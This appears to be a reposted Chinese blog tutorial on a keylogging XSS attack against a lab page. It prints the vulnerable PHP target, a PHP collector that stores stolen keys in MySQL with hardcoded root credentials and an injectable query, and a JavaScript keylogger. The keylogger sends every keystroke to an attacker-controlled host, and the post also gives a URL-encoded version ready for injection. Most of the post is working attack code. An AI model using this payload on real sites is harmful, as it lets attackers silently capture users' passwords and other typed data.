当前位置: 首页 > news >正文

键盘监听事件xss攻击

靶机

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

攻击机

<?php$key = $_GET['keys'];$conn=mysqli_connect("192.168.190.134", "root", "123456", "mydemo",3306);mysqli_query($conn, "set names utf8");$sql = "insert into infos(info) values('$key')";$res = @mysqli_query($conn, $sql);
?>

攻击机前端代码

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body><script>var keys="";document.onkeyup = function(e){keys += e.key;var xmlobj = new XMLHttpRequest();xmlobj.open("GET", "http://192.168.190.134/woniu/getkeys.php?keys="+keys);xmlobj.send();}</script>
</body>
</html>

调试代码:

http://192.168.190.134/liyangguang/user.html
# 如果可以成功写入数据库,则证明script脚本没有问题

客户机攻击脚本

image-20240919160140433

# 注意:脚本中的+号,会被浏览器按照空格进行处理,所以需要对+进行url转码%2b
<script>var keys="";document.onkeyup = function(e){keys %2b= e.key;var xmlobj = new XMLHttpRequest();xmlobj.open("GET", "http://192.168.190.134/woniu/getkeys.php?keys="%2bkeys);xmlobj.send();
}
</script>

结果

image-20240919170506818


http://www.mrgr.cn/news/62505.html

相关文章:

  • 【ANTs】医疗影像工具ANTs多种安装方式教程和使用
  • 使用C#学习Office文件的处理(pptx docx xlsx)
  • LeetCode 热题 100之子串
  • UOS中读取 bitlocker加密的U盘
  • Kylin Server V10 下编译安装 Python
  • react使用Fullcalendar
  • C++学习日记 | LAB 11 类中的动态内存管理
  • (五)Web前端开发进阶2——AJAX
  • Fsm3
  • Diving into the STM32 HAL-----USART
  • X86下fftw3库的编译和链接undefined reference to fftwf_malloc
  • 什么是ajax,为什么使用ajax?ajax都有哪些优点和缺点?
  • 006 单词倒序
  • 使用sql计算每天新增用户的ltv1、ltv2以及次留
  • 批量删除redis数据【亲测可用】
  • 校园社团信息管理:Spring Boot技术的优势与实现
  • 期货跟单、量化交易模拟演示系统
  • Abaqus自己构建材料库导入材料库
  • AUTOSAR CP中的CDD复杂驱动介绍
  • Javaweb梳理3——SQL概述+DDL语句1
  • SpringBoot旋律:打造现代Web音乐平台
  • 【专题】2024年金融数字化转型白皮书报告汇总PDF洞察(附原数据表)
  • 从“死敌”到“盟友”,英特尔和AMD世纪大“和解”!
  • 不再输入单号查快递,批量查快递单号信息的新方法,智能排序快递时效并查找时效相同的单号,一站式物流查询解决方案
  • 从零开始设计简易Queue:底层原理与实现
  • 【传知代码】检测图像P图痕迹(论文复现)